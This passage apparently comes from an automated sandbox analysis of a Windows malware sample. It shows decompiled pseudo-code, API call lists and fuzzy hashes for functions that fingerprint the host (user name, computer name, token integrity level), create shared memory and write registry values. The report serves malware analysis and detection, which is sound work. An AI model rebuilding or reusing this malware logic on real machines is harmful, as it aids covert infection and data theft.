                                                          • Part of subcall function 01205335: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05769350,?,00000000,30314549,00000014,004F0053,0576930C), ref: 01205421
                                                          • Part of subcall function 01205335: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01205131), ref: 01205433
                                                        • GetLastError.KERNEL32 ref: 0120522F
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                        • String ID:
                                                        • API String ID: 3521023985-0
                                                        • Opcode ID: 3d65084c488155e8789b24329d3c09d433151a001990d1cd42d7a63ed78fdfc3
                                                        • Instruction ID: a8697fc14c29c2568937ba07f3ad732d8b51674b55cabc838d84edf0dc73537f
                                                        • Opcode Fuzzy Hash: 3d65084c488155e8789b24329d3c09d433151a001990d1cd42d7a63ed78fdfc3
                                                        • Instruction Fuzzy Hash: CA512A7181122AAFDF22DF949C889EEBFB9EF05724F104216F515A2196D7719640CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012066CE, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 74%
                                                        			E012066CE(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L01207DD6();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x120a2d4; // 0x455d5a8
				_t5 = _t13 + 0x120b84d; // 0x5768df5
				_t6 = _t13 + 0x120b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L01207ABA();
				_t17 = CreateFileMappingW(0xffffffff, 0x120a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                        0x012066ce
                                                        0x012066d6
                                                        0x012066da
                                                        0x012066e0
                                                        0x012066e5
                                                        0x012066ea
                                                        0x012066ed
                                                        0x012066f0
                                                        0x012066f5
                                                        0x012066f6
                                                        0x012066f9
                                                        0x012066fe
                                                        0x01206705
                                                        0x0120670f
                                                        0x01206711
                                                        0x01206712
                                                        0x01206715
                                                        0x01206731
                                                        0x01206737
                                                        0x0120673b
                                                        0x01206789
                                                        0x0120673d
                                                        0x0120674a
                                                        0x0120675a
                                                        0x01206762
                                                        0x01206774
                                                        0x01206778
                                                        0x00000000
                                                        0x00000000
                                                        0x01206764
                                                        0x01206767
                                                        0x0120676c
                                                        0x0120676e
                                                        0x0120676e
                                                        0x0120674c
                                                        0x0120674e
                                                        0x0120677a
                                                        0x0120677b
                                                        0x0120677b
                                                        0x0120674a
                                                        0x01206790

                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,012043F5,?,00000001,?), ref: 012066DA
                                                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 012066F0
                                                        • _snwprintf.NTDLL ref: 01206715
                                                        • CreateFileMappingW.KERNELBASE(000000FF,0120A2F8,00000004,00000000,00001000,?), ref: 01206731
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,012043F5,?), ref: 01206743
                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 0120675A
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012043F5), ref: 0120677B
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,012043F5,?), ref: 01206783
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                        • String ID:
                                                        • API String ID: 1814172918-0
                                                        • Opcode ID: 444cab79beb39455e44c72cc0a637dc52283d9622e4a584a676288c260b43f84
                                                        • Instruction ID: 7a5120f60bf2447ded46a5bc4dd2f34db87a61b7516d605b544f6c02affab95e
                                                        • Opcode Fuzzy Hash: 444cab79beb39455e44c72cc0a637dc52283d9622e4a584a676288c260b43f84
                                                        • Instruction Fuzzy Hash: 9A21F676640204BFDB27DB68DC49F9D7BB9EB44750F204321FA06E71D3EA709A408760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120435F, Relevance: 10.7, APIs: 7, Instructions: 191memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E0120435F(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E012069CE();
				if(_t27 != 0) {
					_t77 =  *0x120a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x120a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x120a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0120570A( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x120a2d4; // 0x455d5a8
					_push(0x120a2fc);
					_push(1);
					_t7 = _t32 + 0x120b5bc; // 0x4d283a53
					 *0x120a2f8 = 0xc;
					 *0x120a300 = 0;
					L01202BFF();
					_t36 = E012066CE(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E01206CD6(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E01205FBC(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x120a2d4; // 0x455d5a8
								_t18 = _t64 + 0x120b86f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x120a32c = _t87;
						}
						_t38 = E01201262();
						 *0x120a2c8 =  *0x120a2c8 ^ 0xe8fa7dd7;
						 *0x120a31c = _t38;
						_t39 = E01205FBC(0x60);
						__eflags = _t39;
						 *0x120a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x120a37c; // 0x5769630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x120a37c; // 0x5769630
							 *_t56 = 0x120b85e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x120a290, _t84, 0x52);
							__eflags = _t42;
							 *0x120a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x120a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x120a2d4; // 0x455d5a8
								_t19 = _t76 + 0x120b212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x12092a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E01206CD6( ~_v8 &  *0x120a2c8, 0x120a00c); // executed
								_t84 = E0120725F(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E0120355C();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E012050A3(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E01202A24(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x120a14c(); // executed
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E0120663C(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































                                                        0x0120435f
                                                        0x0120436a
                                                        0x0120436d
                                                        0x01204370
                                                        0x01204373
                                                        0x0120437a
                                                        0x0120437c
                                                        0x01204388
                                                        0x0120438a
                                                        0x0120438a
                                                        0x01204393
                                                        0x0120439b
                                                        0x0120439e
                                                        0x012043b8
                                                        0x012043bd
                                                        0x012043be
                                                        0x012043c0
                                                        0x012043c5
                                                        0x012043ca
                                                        0x012043cc
                                                        0x012043d3
                                                        0x012043dd
                                                        0x012043e3
                                                        0x012043f0
                                                        0x012043f7
                                                        0x012043fc
                                                        0x012043fc
                                                        0x01204405
                                                        0x0120442e
                                                        0x01204431
                                                        0x0120443e
                                                        0x01204445
                                                        0x01204451
                                                        0x01204453
                                                        0x01204455
                                                        0x0120445a
                                                        0x01204460
                                                        0x01204466
                                                        0x0120446c
                                                        0x0120446f
                                                        0x01204474
                                                        0x0120447c
                                                        0x0120447e
                                                        0x0120447e
                                                        0x01204481
                                                        0x01204481
                                                        0x01204487
                                                        0x0120448c
                                                        0x01204494
                                                        0x01204499
                                                        0x0120449e
                                                        0x012044a0
                                                        0x012044a5
                                                        0x012044d4
                                                        0x012044a7
                                                        0x012044ac
                                                        0x012044b1
                                                        0x012044b6
                                                        0x012044bd
                                                        0x012044c3
                                                        0x012044c8
                                                        0x012044ce
                                                        0x012044ce
                                                        0x012044d5
                                                        0x012044d7
                                                        0x012044e6
                                                        0x012044ec
                                                        0x012044ee
                                                        0x012044f3
                                                        0x0120451f
                                                        0x012044f5
                                                        0x012044f5
                                                        0x012044fb
                                                        0x01204508
                                                        0x0120450e
                                                        0x0120450e
                                                        0x01204516
                                                        0x01204518
                                                        0x01204520
                                                        0x01204522
                                                        0x01204529
                                                        0x01204536
                                                        0x01204540
                                                        0x01204542
                                                        0x01204544
                                                        0x00000000
                                                        0x00000000
                                                        0x01204546
                                                        0x0120454b
                                                        0x0120454d
                                                        0x01204554
                                                        0x01204558
                                                        0x0120455b
                                                        0x01204570
                                                        0x01204574
                                                        0x01204579
                                                        0x00000000
                                                        0x01204579
                                                        0x0120455d
                                                        0x0120455f
                                                        0x00000000
                                                        0x00000000
                                                        0x01204561
                                                        0x0120456a
                                                        0x0120456c
                                                        0x0120456e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0120456e
                                                        0x01204551
                                                        0x01204551
                                                        0x01204522
                                                        0x01204407
                                                        0x01204407
                                                        0x0120440c
                                                        0x0120457b
                                                        0x0120457f
                                                        0x01204587
                                                        0x01204587
                                                        0x00000000
                                                        0x0120457f
                                                        0x01204412
                                                        0x01204415
                                                        0x01204415
                                                        0x01204417
                                                        0x0120441a
                                                        0x01204422
                                                        0x01204429
                                                        0x00000000
                                                        0x0120458f
                                                        0x0120458f
                                                        0x01204592
                                                        0x01204597
                                                        0x01204597

                                                        APIs
                                                          • Part of subcall function 012069CE: GetModuleHandleA.KERNEL32(4C44544E,00000000,01204378,00000000,00000000,00000000,?,?,?,?,?,012068F7,?,00000001), ref: 012069DD
                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0120A2FC,00000000), ref: 012043E3
                                                        • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,012068F7,?,00000001), ref: 012043FC
                                                        • wsprintfA.USER32 ref: 0120447C
                                                        • memset.NTDLL ref: 012044AC
                                                        • RtlInitializeCriticalSection.NTDLL(057695F0), ref: 012044BD
                                                        • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 012044E6
                                                        • wsprintfA.USER32 ref: 01204516
                                                          • Part of subcall function 01206CD6: GetUserNameW.ADVAPI32(00000000,0120453B), ref: 01206D0D
                                                          • Part of subcall function 01206CD6: RtlAllocateHeap.NTDLL(00000000,0120453B), ref: 01206D24
                                                          • Part of subcall function 01206CD6: GetUserNameW.ADVAPI32(00000000,0120453B), ref: 01206D31
                                                          • Part of subcall function 01206CD6: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,0120453B,?,?,?,?,?,012068F7,?,00000001), ref: 01206D52
                                                          • Part of subcall function 01206CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 01206D79
                                                          • Part of subcall function 01206CD6: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01206D8D
                                                          • Part of subcall function 01206CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 01206D9A
                                                          • Part of subcall function 01206CD6: HeapFree.KERNEL32(00000000,00000000), ref: 01206DB8
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                        • String ID:
                                                        • API String ID: 2910951584-0
                                                        • Opcode ID: 5297482a44ce48f6bccd4db507a437cc8b55b55cfdee140968e7a79f6e345426
                                                        • Instruction ID: 846a1adc24208f75ecda5553c7fd951d6d91961c93be113e84f846ad76a8d2bd
                                                        • Opcode Fuzzy Hash: 5297482a44ce48f6bccd4db507a437cc8b55b55cfdee140968e7a79f6e345426
                                                        • Instruction Fuzzy Hash: B051B371920216AFDB33EB68B849F6E7BB8AB14700F518325EB04E75C7D77599408B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205FD1, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01205FD1(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x120a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E01205FBC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E012013CC(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                        0x01205fde
                                                        0x01205fe5
                                                        0x01205fec
                                                        0x01206000
                                                        0x0120600b
                                                        0x01206023
                                                        0x01206030
                                                        0x01206033
                                                        0x01206038
                                                        0x01206043
                                                        0x01206047
                                                        0x01206056
                                                        0x0120605a
                                                        0x01206076
                                                        0x01206076
                                                        0x0120607a
                                                        0x0120607a
                                                        0x0120607f
                                                        0x01206083
                                                        0x01206089
                                                        0x0120608a
                                                        0x01206091
                                                        0x01206097

                                                        APIs
                                                        • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01206003
                                                        • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 01206023
                                                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 01206033
                                                        • CloseHandle.KERNEL32(00000000), ref: 01206083
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 01206056
                                                        • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0120605E
                                                        • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0120606E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                        • String ID:
                                                        • API String ID: 1295030180-0
                                                        • Opcode ID: 26bd7eaa92024116e143820cbec8a6a07d1cba3f20d1464683155f9402dda146
                                                        • Instruction ID: 2398846408cad992b2202df4846fefcb3168f964bce7acf17e32f4a8e12fa0ad
                                                        • Opcode Fuzzy Hash: 26bd7eaa92024116e143820cbec8a6a07d1cba3f20d1464683155f9402dda146
                                                        • Instruction Fuzzy Hash: E1213C7590021EFFEB12DFA4DC48EAEBBBAFB04304F004165E611A7292D7715A54EB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01207156, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E01207156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x120a2d4; // 0x455d5a8
				_t1 = _t9 + 0x120b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E01203420(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5769631
					_t40 = E01205FBC(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E01206E5D(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E012013CC(_t40);
						_t42 = E0120216C(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E012013CC(_t36);
							_t36 = _t42;
						}
						_t43 = E01204FE5(_t36, _t33);
						if(_t43 != 0) {
							E012013CC(_t36);
							_t36 = _t43;
						}
					}
					E012013CC(_t28);
				}
				return _t36;
			}
















                                                        0x01207156
                                                        0x01207159
                                                        0x0120715a
                                                        0x01207161
                                                        0x01207168
                                                        0x0120716f
                                                        0x01207173
                                                        0x0120717a
                                                        0x01207181
                                                        0x01207186
                                                        0x0120718e
                                                        0x01207198
                                                        0x0120719c
                                                        0x012071a0
                                                        0x012071a6
                                                        0x012071ab
                                                        0x012071b5
                                                        0x012071bb
                                                        0x012071bd
                                                        0x012071d4
                                                        0x012071d8
                                                        0x012071db
                                                        0x012071e0
                                                        0x012071e0
                                                        0x012071e9
                                                        0x012071ed
                                                        0x012071f0
                                                        0x012071f5
                                                        0x012071f5
                                                        0x012071ed
                                                        0x012071f8
                                                        0x012071fd
                                                        0x01207203

                                                        APIs
                                                          • Part of subcall function 01203420: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0120716F,253D7325,00000000,00000000,?,00000000,01204A9F), ref: 01203487
                                                          • Part of subcall function 01203420: sprintf.NTDLL ref: 012034A8
                                                        • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207181
                                                        • lstrlen.KERNEL32(00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207189
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • strcpy.NTDLL ref: 012071A0
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 012071AB
                                                          • Part of subcall function 01206E5D: lstrlen.KERNEL32(00000000,00000000,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 01206E6E
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 012071C8
                                                          • Part of subcall function 0120216C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,012071D4,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01202176
                                                          • Part of subcall function 0120216C: _snprintf.NTDLL ref: 012021D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                        • String ID: =
                                                        • API String ID: 2864389247-1428090586
                                                        • Opcode ID: 81a5e126e844464c7649ade1a39c0295ecc25a8bfa735c1f163940f24e525a29
                                                        • Instruction ID: 8cb030e04c3fc8863159aa0a63562735fd1a10f1c8617c8fceaa035f9059d0aa
                                                        • Opcode Fuzzy Hash: 81a5e126e844464c7649ade1a39c0295ecc25a8bfa735c1f163940f24e525a29
                                                        • Instruction Fuzzy Hash: 4711C2379212277B87237BB89C88C7F7BAE9E556543051316F608A7283CE74DD0187E4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01204DA1, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 01203686: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057689D0,01204DD1,?,?,?,?,?,?,?,?,?,?,?,01204DD1), ref: 01203752
                                                          • Part of subcall function 01206566: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 012065A3
                                                          • Part of subcall function 01206566: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 012065D4
                                                        • SysAllocString.OLEAUT32(?), ref: 01204DFD
                                                        • SysAllocString.OLEAUT32(0070006F), ref: 01204E11
                                                        • SysAllocString.OLEAUT32(00000000), ref: 01204E23
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204E87
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204E96
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204EA1
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                        • String ID:
                                                        • API String ID: 2831207796-0
                                                        • Opcode ID: 7d05cd251f6fc427c113cbdf6dfbcf3cf5d5e62d48fbd4c4c3d96d7f07dbcc29
                                                        • Instruction ID: f8663a081d3123b3b4ddd89a9fd31bfeb45e3bee0c30e59f13678575e05df3b4
                                                        • Opcode Fuzzy Hash: 7d05cd251f6fc427c113cbdf6dfbcf3cf5d5e62d48fbd4c4c3d96d7f07dbcc29
                                                        • Instruction Fuzzy Hash: CD317132D10609AFDF02EFACD848A9FBBB6AF48304F148525EA14EB151DB719D05CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205448, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E01205448(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x120a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E01203FC1( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E012069FD(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E012013CC(_a8);
						goto L29;
					}
					_t64 =  *0x120a2cc; // 0x5769cd0
					_t16 = _t64 + 0xc; // 0x5769dc4
					_t65 = E01203FC1(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d012090, executed
						_t67 = E01201E65(_t97,  *_t33, _t91, _a8,  *0x120a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x120a2d4; // 0x455d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x120b9ef; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x120b907; // 0x55434b48
								_t69 = _t34;
							}
							if(E01206414(_t69,  *0x120a384,  *0x120a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x120a2d4; // 0x455d5a8
									_t44 = _t71 + 0x120b892; // 0x74666f53
									_t73 = E01203FC1(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d012090
										E0120304F( *_t47, _t91, _a8,  *0x120a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d012090
										E0120304F( *_t49, _t91, _t99,  *0x120a380, _a16);
										E012013CC(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d012090, executed
									E0120304F( *_t40, _t91, _a8,  *0x120a388, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d012090
									E0120304F( *_t43, _t91, _a8,  *0x120a380, _a16);
								}
